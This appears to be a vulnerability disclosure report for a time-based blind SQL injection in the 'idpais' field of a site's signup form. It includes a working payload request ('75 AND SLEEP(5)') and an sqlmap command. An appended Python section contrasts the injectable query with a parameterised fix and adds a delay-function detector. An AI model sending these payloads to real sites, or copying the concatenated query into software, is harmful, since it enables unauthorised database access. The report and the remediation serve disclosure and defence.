Time Based Blind SQL Injection
URL:
https://tools.redacted.com/en/mybox/new-account/
Description:
The resource doesn’t properly sanitize the “idpais” variable before putting it into a MySQL statement. This results in a Blind SQL Injection vulnerability. We can demonstrate the vulnerability by making the MySQL server sleep for a while before responding.
Steps to Reproduce:
1) Go to this URL:
https://tools.redacted.com/en/mybox/new-account/
2) Create an account and capture the “POST” request that is sent; the request is shown below.
3) The vulnerable parameter “idpais” is passed in the POST body; insert a Blind SQL payload into it.
4) The delayed response confirms Time Based Blind SQL Injection.
Request:
POST /en/mybox/finish-new-account/ HTTP/1.1
Host: tools.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
langdir=en%2F&mr_mrs=Mr&nombre=dfd&apellidos=fdfsdfd&email=test%40abc.com&idpais=75 AND SLEEP(5)&countryCallingCode=%2B+1&telefono=219923171&nacimiento=1990-05-04&direccion=ffddf+&ciudad=dfdffdf&cp=10005&password=Passwd1&renewPassword=PAsswd1&empr_omitir=on&acept-1=on&accept_marketing=on&accept_profile=on
The response arrives after around 5 seconds, showing that the SLEEP command was executed.
Manual POC:
SQLMAP POC:
SQLMAP Command: (POST Request)
sqlmap -r request.txt -p idpais
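Added remediation and detection example (not part of the original report, and not the site's own code): the concatenation anti-pattern the report describes beside a hardened lookup that validates “idpais” as an integer and binds it as a parameter, plus a helper that flags time-delay functions in a decoded POST body for WAF or log review. The table and column names, the driver placeholder style, and the sample body are assumptions.

```python
import re
from typing import Dict, Tuple
from urllib.parse import parse_qs

# Constructed sample POST body modelled on the report's request; only the
# idpais payload mirrors the report, the other values are made up.
SAMPLE_BODY = ("langdir=en%2F&nombre=dfd&email=test%40abc.com"
               "&idpais=75 AND SLEEP(5)&cp=10005")


def vulnerable_query(idpais: str) -> str:
    """The anti-pattern behind the finding: untrusted input spliced straight
    into the SQL text, so 'idpais' can carry SQL rather than just a number."""
    return f"SELECT nombre FROM paises WHERE idpais = {idpais}"  # hypothetical table


def is_valid_idpais(idpais: str) -> bool:
    """A country id is a small positive integer; reject anything else."""
    return re.fullmatch(r"[0-9]{1,6}", idpais) is not None


def safe_query(idpais: str) -> Tuple[str, Tuple[int, ...]]:
    """Hardened form: validate the shape, then pass the value as a bound
    parameter so the driver never interprets it as SQL."""
    if not is_valid_idpais(idpais):
        raise ValueError(f"idpais must be a positive integer, got {idpais!r}")
    # %s is the placeholder style of MySQL DB-API drivers (e.g. PyMySQL).
    return "SELECT nombre FROM paises WHERE idpais = %s", (int(idpais),)


# SQL time-delay primitives; none of them belongs in a country id field.
_DELAY_RE = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(?", re.I)


def flag_delay_payloads(body: str) -> Dict[str, str]:
    """Detection helper: return the form fields of a URL-encoded body whose
    decoded value contains a SQL time-delay function."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items() if _DELAY_RE.search(v[0])}


if __name__ == "__main__":
    print("vulnerable:", vulnerable_query("75 AND SLEEP(5)"))
    print("hardened:  ", safe_query("75"))
    print("flagged:   ", flag_delay_payloads(SAMPLE_BODY))
```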